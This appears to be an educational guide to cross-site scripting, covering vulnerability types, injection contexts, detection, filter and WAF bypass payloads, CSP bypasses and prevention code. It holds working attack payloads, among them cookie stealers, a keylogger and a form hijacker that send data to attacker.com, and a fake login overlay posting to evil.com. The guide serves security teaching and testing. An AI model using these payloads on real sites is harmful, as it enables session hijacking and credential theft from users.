Documentation
Complete XSS security guide: from fundamentals to advanced exploitation and prevention
Educational Purpose Only
This documentation is for authorized security testing and educational use only. Always obtain proper written authorization before testing any systems.
XSS Fundamentals
What is Cross-Site Scripting?
Cross-Site Scripting (XSS) is a security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. When the victim loads the page, the malicious script executes in their browser context.
- Steal Session Cookies: access authentication tokens and hijack user sessions
- Perform Actions as User: execute any action the user can perform on the website
- Access Sensitive Data: read private information displayed on the page
- Phishing Attacks: display fake forms to capture credentials
- Malicious Redirects: redirect users to malicious websites
- Network Reconnaissance: scan internal networks via the browser
Types of XSS Vulnerabilities
Reflected XSS
Severity: High. The payload is reflected off the web server as part of the response, typically delivered via URL parameters.
<!-- Vulnerable PHP -->
<h1>Welcome <?php echo $_GET['name']; ?>!</h1>
<!-- Malicious URL -->
https://example.com/welcome.php?name=<script>alert('XSS')</script>
Stored XSS
Severity: Critical. The payload is permanently stored on the target server and served to every user who views the affected page.
<!-- Vulnerable comment display -->
<div class="comment">
  <p><?php echo $comment['message']; ?></p>
</div>
<!-- Malicious comment -->
<script>document.location="http://evil.com/?c="+document.cookie</script>
DOM-Based XSS
Severity: High. The vulnerability lies in client-side JavaScript: the payload modifies the DOM without any server interaction.
// Vulnerable DOM manipulation
var name = location.hash.substring(1);
document.getElementById('welcome').innerHTML = 'Hello ' + name;
// Malicious URL
https://example.com/page.html#<img src=x onerror=alert(1)>
Execution Contexts
Understanding where your payload executes is crucial. Different contexts require different approaches:
HTML Context
  Template: <div>Hello $userInput</div>
  Payload:  <script>alert("XSS")</script>
  Result:   <div>Hello <script>alert("XSS")</script></div>
Attribute Context
  Template: <input value="$userInput">
  Payload:  " onmouseover="alert('XSS')
  Result:   <input value="" onmouseover="alert('XSS')">
JavaScript Context
  Template: <script>var x = '$userInput';</script>
  Payload:  ';alert('XSS');//
  Result:   <script>var x = '';alert('XSS');//';</script>
URL Context
  Template: <a href="$userURL">Click</a>
  Payload:  javascript:alert('XSS')
  Result:   <a href="javascript:alert('XSS')">Click</a>
CSS Context
  Template: <style>body{background:$color}</style>
  Payload:  red}</style><script>alert(1)</script>
  Result:   <style>body{background:red}</style><script>alert(1)</script>
Detection Techniques
Manual Testing Strategy
Manual testing remains one of the most effective ways to discover XSS vulnerabilities.
1. Identify all input points: URL params, form fields, HTTP headers, cookies
2. Test with simple HTML: <h1>test</h1>
3. Test script execution: <script>alert(1)</script>
4. Test event handlers: <img src=x onerror=alert(1)>
5. Test context breaking: "><script>alert(1)</script>
6. Try advanced payloads: <svg onload=alert(1)>
7. Test encoding bypasses: %3Cscript%3Ealert(1)%3C/script%3E
8. Check for DOM-based sinks: innerHTML, document.write, eval
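Step 8 in practice, as an added example that is not part of the original guide: a small Node.js script that scans JavaScript source for the listed DOM sinks and reports only the writes fed from an attacker-controlled source, using the guide's own location.hash example as constructed input. The sink and source lists are this example's own and are illustrative, not exhaustive.

```javascript
// Added example (not from the guide): a line-oriented check for the DOM sinks
// named in step 8, with one-hop taint tracking so the guide's own two-line
// pattern (source into a variable, variable into innerHTML) is caught.
// Sink and source lists are illustrative, not exhaustive.
const SINKS = [
  /\.innerHTML\s*=/, /\.outerHTML\s*=/, /\.insertAdjacentHTML\s*\(/,
  /document\.write(ln)?\s*\(/, /\beval\s*\(/, /\bsetTimeout\s*\(\s*['"`]/,
];
const SOURCES = [
  /location\.(hash|search|href|pathname)/, /document\.(URL|referrer|cookie)/,
  /window\.name/, /searchParams\.get\s*\(/,
];

// Returns [{ line, text }] for every line that writes attacker-influenced data
// into a sink: either a source appears on the same line, or a variable that was
// earlier assigned directly from a source does.
function findDomSinks(source) {
  const tainted = new Set();
  const hits = [];
  source.split('\n').forEach((text, i) => {
    const hasSource = SOURCES.some((re) => re.test(text));
    const decl = text.match(/\b(?:var|let|const)\s+(\w+)\s*=/);
    if (decl && hasSource) tainted.add(decl[1]);
    if (!SINKS.some((re) => re.test(text))) return;
    const usesTainted = [...tainted].some((v) => new RegExp(`\\b${v}\\b`).test(text));
    if (hasSource || usesTainted) hits.push({ line: i + 1, text: text.trim() });
  });
  return hits;
}

// Constructed sample: lines 1-2 are the guide's DOM-based XSS example, line 3 is
// its safe textContent form, line 5 is a sink fed only by a constant.
const SAMPLE = [
  "var name = location.hash.substring(1);",
  "document.getElementById('welcome').innerHTML = 'Hello ' + name;",
  "document.getElementById('welcome').textContent = 'Hello ' + name;",
  "var greeting = 'Hello';",
  "document.getElementById('static').innerHTML = greeting;",
  "document.write('<p>' + document.referrer + '</p>');",
  "eval(new URL(location.href).searchParams.get('cb'));",
].join('\n');

// Reports lines 2, 6 and 7.
console.log(findDomSinks(SAMPLE));
```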
Scanning Tools
- Burp Suite Professional: industry standard web application security testing platform
- OWASP ZAP: free and open-source security testing proxy
- XSStrike: advanced XSS detection suite with fuzzing capabilities
- XSSHunter: blind XSS detection platform for stored vulnerabilities
- Dalfox: fast XSS scanner and parameter analysis tool
- XSSer: automatic XSS detection and exploitation framework
Fuzzing Strategies
Systematic fuzzing helps discover edge cases that manual testing might miss:
1. Start with polyglot payloads that work across multiple contexts
2. Fuzz special characters: < > " ' / \ ; : = ( ) { } [ ]
3. Test encoding permutations: URL, HTML entity, Unicode, hex
4. Try null bytes and control characters as separators
5. Test length boundaries and truncation behavior
6. Fuzz HTTP headers: Referer, User-Agent, X-Forwarded-For
Bypass Techniques
Filter Evasion
When basic payloads are blocked, encoding and obfuscation techniques can bypass filters:
Case Manipulation
<ScRiPt>alert(1)</ScRiPt>
<SCRIPT>alert(1)</SCRIPT>
<script\t>alert(1)</script>
URL Encoding
%3Cscript%3Ealert(1)%3C/script%3E
%253Cscript%253Ealert(1)%253C/script%253E
HTML Entity Encoding
&lt;script&gt;alert(1)&lt;/script&gt;
&#60;script&#62;alert(1)&#60;/script&#62;
Unicode Encoding
\u003Cscript\u003Ealert(1)\u003C/script\u003E
<\u0073cript>alert(1)</\u0073cript>
Null Byte Injection
<scri\x00pt>alert(1)</script>
<img src=x on\x00error=alert(1)>
Comment Insertion
<scr<!---->ipt>alert(1)</script>
<img src=x on/**/error=alert(1)>
Alternative Event Handlers
When common event handlers are blocked, try these alternatives:
Mouse Events
onmouseover, onmouseout, onmousedown, onmouseup, onclick, ondblclick
Keyboard Events
onkeydown, onkeyup, onkeypress
Form Events
onfocus, onblur, onchange, onsubmit, oninput
Media Events
onload, onerror, onresize, onscroll, oncanplay
HTML5 Events
ontoggle, onpointerover, onanimationend, onautocomplete, onwheel
WAF Bypass Techniques
Web Application Firewalls implement various rules to block XSS. Here are proven bypass techniques:
Cloudflare
# Unicode bypass
<script>alert\u0028\u0031\u0029</script>
# Case variation
<ScRiPt>alert(1)</ScRiPt>
# Encoding combination
<script>eval(atob('YWxlcnQoMSk='))</script>
# Template literals
<script>alert`1`</script>
AWS WAF
# Mixed case with spaces
< ScRiPt >alert(1)</ ScRiPt >
# Alternative tags
<svg onload=alert(1)>
<iframe src=javascript:alert(1)>
# Event handler variations
<img src=x oNlOaD=alert(1)>
ModSecurity
# Comment injection
<script>/**/alert(1)</script>
# String concatenation
<script>alert(String.fromCharCode(49))</script>
# Alternative execution
<script>Function('alert(1)')()</script>
Akamai
# Mixed case
<ScRiPt>alert(1)</ScRiPt>
# Attribute padding
<img src =x onerror =alert(1)>
# Unicode events
<img src=x oN\u0065rror=alert(1)>
CSP Bypasses
Content Security Policy (CSP) is a powerful defense mechanism, but certain configurations can be bypassed:
JSONP Endpoints
If CSP allows certain domains, look for JSONP endpoints:
<script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1)"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.0/angular.min.js"></script>
<div ng-app ng-csp ng-click=$event.view.alert(1337)>Click</div>
Base Tag Injection
Manipulate relative URLs:
<base href="//evil.com/">
<script src="./legitimate-script.js"></script>
Nonce/Hash Bypasses
Look for nonce reuse or hash collisions:
# Nonce reuse
<script nonce="abc123">alert(1)</script>
# Script gadgets on whitelisted CDNs
<script src="https://allowed-cdn.com/angular.js"></script>
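As a defensive counterpart to the bypasses above, an added example that is not from the guide: a Node.js linter that parses a Content-Security-Policy value and reports the settings these bypasses depend on (host allowlists for JSONP and script gadgets, a missing base-uri for base tag injection, and 'unsafe-inline' or 'unsafe-eval' in script-src). The sample policies are constructed; the strict one is the policy from this guide's Prevention section.

```javascript
// Added example (not from the guide): a small linter for Content-Security-Policy
// header values that reports the configurations the bypasses above depend on.
// It is a starting point for review, not a full CSP evaluator.
function parseCsp(header) {
  const policy = {};
  header.split(';').forEach((part) => {
    const [name, ...values] = part.trim().split(/\s+/);
    if (name) policy[name.toLowerCase()] = values;
  });
  return policy;
}

function lintCsp(header) {
  const p = parseCsp(header);
  const findings = [];
  const scriptSrc = p['script-src'] || p['default-src'] || [];
  // Browsers ignore 'unsafe-inline' once a nonce or hash is present, so only
  // flag it when it actually takes effect.
  const hasNonceOrHash = scriptSrc.some((v) => /^'(nonce-|sha(256|384|512)-)/i.test(v));
  if (scriptSrc.includes("'unsafe-inline'") && !hasNonceOrHash) {
    findings.push("script-src: 'unsafe-inline' lets injected inline scripts run");
  }
  if (scriptSrc.includes("'unsafe-eval'")) {
    findings.push("script-src: 'unsafe-eval' lets eval/Function/setTimeout strings run");
  }
  // Any unquoted entry is a host or scheme allowlist: the JSONP and script-gadget
  // bypasses above work against exactly these. With 'strict-dynamic' browsers
  // ignore host entries, so the check is skipped in that case.
  if (!scriptSrc.includes("'strict-dynamic'")) {
    scriptSrc.filter((v) => !v.startsWith("'")).forEach((v) => {
      findings.push(`script-src: allowlisted ${v}; review it for JSONP endpoints and script gadgets`);
    });
  }
  // Without base-uri, <base href> injection can retarget relative script URLs.
  if (!p['base-uri']) findings.push('base-uri: missing');
  return findings;
}

// Constructed inputs: the policy from the Prevention section of this guide, and
// a weaker one of the kind the bypasses in this section target.
const STRICT_CSP = "default-src 'self'; script-src 'self' 'nonce-{random}'; base-uri 'self'";
const WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' https://cdnjs.cloudflare.com";

console.log(lintCsp(STRICT_CSP)); // []
console.log(lintCsp(WEAK_CSP));   // three findings
```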
Advanced Encoding
Various encoding methods can bypass filters that don't properly decode input:
Numeric Character References
# Decimal
&#60;script&#62;alert(1)&#60;/script&#62;
# Hexadecimal
&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;
Unicode Normalization
# Unicode bypass
<script>alert\u0028\u0031\u0029</script>
# Overlong encoding
<script>eval('\\u{61}\\u{6C}\\u{65}\\u{72}\\u{74}(1)')</script>
Base64 & Alternative
# Base64 payload
<script>eval(atob('YWxlcnQoMSk='))</script>
# FromCharCode
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
Alternative Execution
# Template literals
<script>alert`1`</script>
# Function constructor
<script>[].constructor.constructor('alert(1)')()</script>
# setTimeout
<script>setTimeout('alert(1)',0)</script>
Exploitation
Session Hijacking
The most common XSS exploitation technique: stealing session cookies to impersonate users.
// Cookie stealer
new Image().src="https://attacker.com/steal?c="+document.cookie;
// Fetch-based exfiltration
fetch("https://attacker.com/log",{
  method:"POST",
  body:JSON.stringify({cookies:document.cookie,url:location.href})
});
Keylogging & Credential Theft
Capture keystrokes and form submissions to steal credentials.
// Keylogger
document.addEventListener("keypress",function(e){
  new Image().src="https://attacker.com/log?k="+e.key;
});
// Form hijacking
document.forms[0].addEventListener("submit",function(){
  fetch("https://attacker.com/creds",{
    method:"POST", body:new FormData(this)
  });
});
Phishing via XSS
Inject convincing fake login forms into legitimate websites.
// Inject a fake login overlay
document.body.innerHTML = '<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.8);display:flex;align-items:center;justify-content:center;z-index:99999"><div style="background:#fff;padding:40px;border-radius:12px;max-width:400px;width:90%"><h2>Session Expired</h2><p>Please log in again</p><form action="https://evil.com/phish"><input name="user" placeholder="Email"><input name="pass" type="password" placeholder="Password"><button>Sign In</button></form></div></div>';
Prevention
Output Encoding
The primary defense against XSS: encode data before inserting it into the page, using the encoder that matches the context the data lands in (HTML body, attribute, JavaScript string, URL or CSS, as listed under Execution Contexts).
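An added example, not part of the original guide, showing one encoder per context from the Execution Contexts section (Node.js; all function names are this example's own): HTML escaping, JavaScript string escaping, scheme allowlisting for URLs, a strict pattern for CSS values, and the guide's templates rendered with each.

```javascript
// Added example (not from the guide): one encoder per execution context from
// the "Execution Contexts" section. The defence is choosing the encoder by where
// the value lands, not by what the value looks like.

// HTML body and quoted-attribute context: the five characters that can start
// markup or close an attribute.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal context: \uXXXX-escape every non-alphanumeric code
// unit, so quotes, backslashes and "</script>" cannot end the literal or the tag.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// URL (href) context: encoding cannot help, because "javascript:" is a valid
// attribute value. Allowlist the scheme instead. Browsers strip leading/trailing
// controls and all tabs/newlines before parsing, so "java\tscript:" is rejected too.
const SAFE_SCHEMES = new Set(['http:', 'https:', 'mailto:']);
function safeHref(url) {
  const cleaned = String(url).replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '').replace(/[\t\n\r]/g, '');
  if (!/^[a-z][a-z0-9+.-]*:/i.test(cleaned)) return cleaned; // relative URL, no scheme
  try {
    if (SAFE_SCHEMES.has(new URL(cleaned).protocol)) return cleaned;
  } catch (e) { /* unparseable: fall through to the safe default */ }
  return 'about:blank';
}

// CSS value context: no escaping scheme is reliable inside <style>, so accept
// only a strict pattern (named colour or hex colour) and reject everything else.
function safeCssColor(v) {
  return /^(#[0-9a-f]{3,8}|[a-z]{1,20})$/i.test(String(v)) ? String(v) : 'inherit';
}

// Render the templates from the guide's context table with a value placed in
// each, using the matching encoder.
function render(value) {
  return {
    html: `<div>Hello ${encodeHtml(value)}</div>`,
    attr: `<input value="${encodeHtml(value)}">`,
    js: `<script>var x = '${encodeJsString(value)}';</script>`,
    url: `<a href="${encodeHtml(safeHref(value))}">Click</a>`,
    css: `<style>body{background:${safeCssColor(value)}}</style>`,
  };
}
```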
Content Security Policy
CSP is a browser security mechanism that restricts content sources:
Content-Security-Policy:
  default-src 'self';
  script-src 'self' 'nonce-{random}';
  style-src 'self' 'unsafe-inline';
  img-src 'self' data: https:;
  connect-src 'self' https://api.example.com;
  frame-ancestors 'none';
  base-uri 'self';
Input Validation
Validate and sanitize all user input on both client and server side:
1. Use allowlists over denylists wherever possible
2. Validate data type, length, format, and range
3. Use parameterized queries / prepared statements
4. Implement strict Content-Type headers
5. Set HttpOnly, Secure, SameSite cookie flags
6. Use modern frameworks with auto-escaping (React, Angular, Vue)
7. Implement Subresource Integrity (SRI) for external scripts
Tools & Resources
Essential References
- Official OWASP prevention guide
- Hands-on XSS labs and tutorials
- Comprehensive XSS techniques wiki
- Massive payload collection on GitHub
- Interactive cheat sheet with event handlers
- Advanced research techniques